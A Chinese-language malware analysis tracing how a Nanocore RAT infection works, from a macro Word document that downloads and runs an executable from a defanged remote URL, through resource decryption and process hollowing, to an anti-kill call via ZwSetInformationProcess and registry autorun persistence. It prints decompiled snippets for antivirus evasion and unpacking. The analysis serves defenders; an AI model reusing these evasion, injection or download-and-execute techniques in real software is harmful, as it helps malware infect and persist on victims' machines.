分析 Nanocore

Nanocore是一个非常强大的木马控制系统，当Nanocore木马运行时，我们发现Windows Defender可以很好地识别威胁。本文的目的是分析Nanocore的传播方式，它是怎样感染Windows系统的。

样本是一个名为“eml_-_PO20180921.doc”的word文档，打开后，你会看到黄色的安全警告信息。这是因为文档中包含有宏代码。当Victim点击"Enable Content"之后，宏代码（即VBA代码）就会默默自动执行。

通过分析该VBA代码，可以看出这段宏代码的作用是从远端服务器下载一个可执行程序（ “hxxp://www.wwpdubai.com/wp-content/plugins/jav/inv.exe” ），并将其保存至本地（“%temp% \CUVJN.exe”），最后执行它。但是CUVJN.exe并非Nanocore。请继续往下看。

接下来，我们仔细分析CUVJN.exe。用 .Net debugger dnSpy打开CUVJN.exe，发现程序会从资源区不断地加载数据块，最后把这些数据块解密数据并生成一个新的PE文件。

这个新的PE文件名为 “dll.exe”。下面这段代码中，“МđыдĐäѦГБуѦ”调用了主程序 “main” ， 参数 “crap” 包含 “main” 功能。

public static void МđыдĐäѦГБуѦ(object fileName, object crap)
    {
        checked
        {
            try
            {
                NewLateBinding.LateCall(crap, null, "invoke", new object[]
                {null, new object[0] }, null, null, null, true);
                int num = 0;
                object instance;
[ ... ]

“dll.exe”是一个守护进程。我们继续研究 main() 函数。首先它建立了一个 Mutex锁，检查进程是否存在。接下来，它检查Victim机器上是否已经加载了"“snxhk.dll” ，进而判断"Avast 是否已经在运行。如果 Avast已经在运行，它继续等待直到Avast被卸载。Avast是一个反病毒软件， “snxhk.dll” 是其模块之一。

public static void avast()    {
        try        {
            IntPtr moduleHandle = RunPE.GetModuleHandle("snxhk.dll");
            while (moduleHandle != IntPtr.Zero)            {
                moduleHandle = RunPE.GetModuleHandle("snxhk.dll");
                Thread.Sleep(500);
            }
        }
        catch (Exception ex)
        {        }
    }

接下来执行与上述行为类似的工作，从资源区中加载数据并组成一个gzip档案。解压后又形成了一个新的PE文件，这次是NanoCore RAT核心客户端。

public static byte[] DEC(byte[] ThrowApples, int VAR12 = 70)
 {
        int num = 0;
        GZipStream gzipStream = new GZipStream(new MemoryStream(ThrowApples), CompressionMode.Decompress, true);
        int num2 = ThrowApples.Length;

byte[] result;
        try   
        {     
            byte[] array;
            for (;;)  
               {     
                array = (byte[])Utils.CopyArray((Array)array, new byte[num + num2 + 1]);
                int num3 = gzipStream.Read(array, num, num2);
                if (num3 == 0)
                    {     break;     }
                num += num3;
              }
            array = (byte[])Utils.CopyArray((Array)array, new byte[num - 1 + 1]);
            result = array;
         }
 [ … ]

在执行NanoCore之前，它执行了一些检查。它检测当前进程的路径是否是“%AppData%\Microsoft\Windows\ScreenToGif\netprotocol.exe”。很显然，这里会返回False，因为我们仍然在CUVJN.exe进行中，路径为“%temp%\CUVJN.exe”。接下来，程序会停止CUVJN.exe的运行，并将其拷贝至 “%AppData%\Microsoft\Windows\ScreenToGif\” ，并重命名为  “netprotocol.exe”。之后，它建立一个新的Process对象，并调用它的Start函数。最后，它调用 “ProjectData.EndApp()"中止CUVJN.exe进程。

netprotocol.exe实际上是CUVJN.exe，它做的工作和CUVJN.exe差不多是相同的。唯独在程序中止的地方不同，netprotocol.exe在最后检查自己的绝对路径时，发现已经是netprotocol.exe，中止运行。

"dll.exe"是一个守护进程，它派生了"netprotocol.exe"，插入Nanocore进内存，然后运行它。dll.exe的一个重要任务就是让netprotocol.exe中的Nanocore可以不被杀死，正常运行。dll.exe有一个类称作"ProjectMe"，它有一个成员函数Project.Protect来保护自己不被杀死。"netprotocol.exe"既不是一个系统进程，也没有更高的权限，但"netprotocol.exe"不能被杀死，这很让人吃惊。下面看一下这个Protect函数

[DllImport("ntdll.dll")]

private static extern IntPtr ZwSetInformationProcess(IntPtr _1, IntPtr _2, IntPtr _3, IntPtr _4);

public static void Protect()
{
    ProtectMe.ZwSetInformationProcess(ProtectMe.GetCurrentProcess(), (IntPtr)33L, (IntPtr)ProtectMe.VarPtr(-2147421911), (IntPtr)4L);

最后我发现，它调用了NTDLL.dll中的 ZwSetInformationProcess函数。这个函数可以修改进程状态，这就是为什么我杀不掉该进程的原因。

有一个名为 “RunPE.doIt()”的函数用于保护NanoCore RAT 客户端。它调用CreateProcessA开启一个新的 “netprotocol.exe”，然后再中止它。接下来，它分配新的内存给“netprotocol.exe” ，并调用WriteProcessMemory将NanoCore 插入新分配的内存。最后，它修改线程的进入点为NanoCore的进入点，调用ResumeThread继续进行NanoCore。NanoCore隐藏得很深，它的代码被混淆了。

一旦 “netprotocol.exe”开始执行，它会在 “%AppData%”目录下建立类似于“AA401429-5100-45C4-9496-689224150CC3” 的目录，此外还会建立大量的子目录，比如“DHCP Manager” 和 “Logs”，然后拷贝 “netprotocol.exe” 到“DHCP Manager”，并重命名为“dhcpmgr.exe”。然后它会在Windows注册表中的“DHCP Manager” 下面建立一个自动运行的项，路径是“dhcpmgr.exe”的位置。

Logs子目录包含了该系统中所有登录用户的行为数据。可以使用WinHex查看 .dat文件以获取详细信息 。